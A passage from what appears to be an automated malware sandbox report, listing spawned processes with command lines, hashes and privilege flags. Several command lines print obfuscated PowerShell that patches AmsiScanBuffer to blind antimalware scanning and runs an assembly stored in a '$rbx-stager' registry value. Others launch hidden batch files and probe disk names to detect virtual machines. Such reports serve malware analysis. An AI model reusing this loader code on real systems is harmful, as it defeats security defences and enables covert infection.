@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OQuoHIIkLqL=$XabpoaxiZGEGR.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+'l'+'3'+'2'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$VQjNvPkAQyhVaI=$ONnlOWkAfaUoGE.Invoke($Null,@([Object]$OQuoHIIkLqL,[Object]('Lo'+[Char](97)+''+'d'+''+[Char](76)+'ib'+[Char](114)+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$qfeujwJPycmGjtIGB=$ONnlOWkAfaUoGE.Invoke($Null,@([Object]$OQuoHIIkLqL,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'P'+[Char](114)+''+'o'+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$VjfjPYd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VQjNvPkAQyhVaI,$vKwAkflJKGpUwNhZmaw).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+'l');$ZjZDXRvDVpnzBqGGH=$ONnlOWkAfaUoGE.Invoke($Null,@([Object]$VjfjPYd,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+'r'+'')));$fXogPYmCjI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qfeujwJPycmGjtIGB,$qJXsDxxmTbuQfbUlnZoHlQ).Invoke($ZjZDXRvDVpnzBqGGH,[uint32]8,4,[ref]$fXogPYmCjI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ZjZDXRvDVpnzBqGGH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qfeujwJPycmGjtIGB,$qJXsDxxmTbuQfbUlnZoHlQ).Invoke($ZjZDXRvDVpnzBqGGH,[uint32]8,0x20,[ref]$fXogPYmCjI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+'W'+'A'+'R'+[Char](69)+'').GetValue(''+'$'+'r'+[Char](98)+''+'x'+'-'+[Char](115)+'t'+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:67
                                                                                                                                                        Start time:18:25:04
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                        Imagebase:0xa50000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:68
                                                                                                                                                        Start time:18:25:04
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:69
                                                                                                                                                        Start time:18:25:04
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:70
                                                                                                                                                        Start time:18:25:04
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:71
                                                                                                                                                        Start time:18:25:04
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                        Imagebase:0xa50000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:72
                                                                                                                                                        Start time:18:25:04
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NyGuwfckeOJe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kiyDauQzMkkpvQ,[Parameter(Position=1)][Type]$OzRVWwEZvx)$JcZRwmspQGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+'s,P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$JcZRwmspQGK.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kiyDauQzMkkpvQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JcZRwmspQGK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OzRVWwEZvx,$kiyDauQzMkkpvQ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $JcZRwmspQGK.CreateType();}$fMzQsfZpmgSNo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+'a'+''+'f'+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$kCZXEMoRMGVaoJ=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+''+'c'+''+[Char](65)+'ddre'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+'b'+'l'+[Char](105)+'c'+[Char](44)+''+'S'+''+'t'+''+[Char](97)+''+[Char](116)+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$LYPstsFMvGDueCuqqFR=NyGuwfckeOJe @([String])([IntPtr]);$RBrwyhNopgzaGFyXfoYzuU=NyGuwfckeOJe @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ngqAWkNvnUU=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+'e'+'tM'+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+[Char](110)+''+[Char](101)+'l'+'3'+'2'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ViSGjgKFWHOvJi=$kCZXEMoRMGVaoJ.Invoke($Null,@([Object]$ngqAWkNvnUU,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+'yA')));$ErlOnVIeWPbCnQNFG=$kCZXEMoRMGVaoJ.Invoke($Null,@([Object]$ngqAWkNvnUU,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$JKCdsPm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ViSGjgKFWHOvJi,$LYPstsFMvGDueCuqqFR).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+'dll');$iERkOmaiRJGubWlVw=$kCZXEMoRMGVaoJ.Invoke($Null,@([Object]$JKCdsPm,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+'S'+''+[Char](99)+'a'+[Char](110)+''+'B'+''+'u'+''+[Char](102)+''+'f'+'e'+[Char](114)+'')));$aRThctnmCd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ErlOnVIeWPbCnQNFG,$RBrwyhNopgzaGFyXfoYzuU).Invoke($iERkOmaiRJGubWlVw,[uint32]8,4,[ref]$aRThctnmCd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iERkOmaiRJGubWlVw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ErlOnVIeWPbCnQNFG,$RBrwyhNopgzaGFyXfoYzuU).Invoke($iERkOmaiRJGubWlVw,[uint32]8,0x20,[ref]$aRThctnmCd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'AR'+'E'+'').GetValue(''+'$'+''+[Char](114)+''+'b'+''+[Char](120)+''+'-'+''+'s'+'t'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:73
                                                                                                                                                        Start time:18:25:05
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:74
                                                                                                                                                        Start time:18:25:05
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:cmd.exe /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:75
                                                                                                                                                        Start time:18:25:06
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:76
                                                                                                                                                        Start time:18:25:07
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:77
                                                                                                                                                        Start time:18:25:07
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:78
                                                                                                                                                        Start time:18:25:14
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:79
                                                                                                                                                        Start time:18:25:14
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:80
                                                                                                                                                        Start time:18:25:14
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:81
                                                                                                                                                        Start time:18:25:14
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:82
                                                                                                                                                        Start time:18:25:16
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:83
                                                                                                                                                        Start time:18:25:16
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:84
                                                                                                                                                        Start time:18:25:17
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:wmic diskdrive get Model
                                                                                                                                                        Imagebase:0x7ff696f50000
                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:85
                                                                                                                                                        Start time:18:25:17
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
                                                                                                                                                        Imagebase:0x7ff70c3f0000
                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:86
                                                                                                                                                        Start time:18:25:19
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:87
                                                                                                                                                        Start time:18:25:20
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:false

                                                                                                                                                        General

                                                                                                                                                        Target ID:88
                                                                                                                                                        Start time:18:25:21
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:wmic diskdrive get Model
                                                                                                                                                        Imagebase:0x7ff696f50000
                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:89
                                                                                                                                                        Start time:18:25:21
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\findstr.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
                                                                                                                                                        Imagebase:0x7ff70c3f0000
                                                                                                                                                        File size:36'352 bytes
                                                                                                                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:90
                                                                                                                                                        Start time:18:25:22
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:91
                                                                                                                                                        Start time:18:25:22
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:92
                                                                                                                                                        Start time:18:25:22
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:93
                                                                                                                                                        Start time:18:25:22
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        General

                                                                                                                                                        Target ID:94
                                                                                                                                                        Start time:18:25:24
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\dllhost.exe /Processid:{b07a7a50-b27b-4e63-a696-921ea5101b06}
                                                                                                                                                        Imagebase:0x7ff6f7fc0000
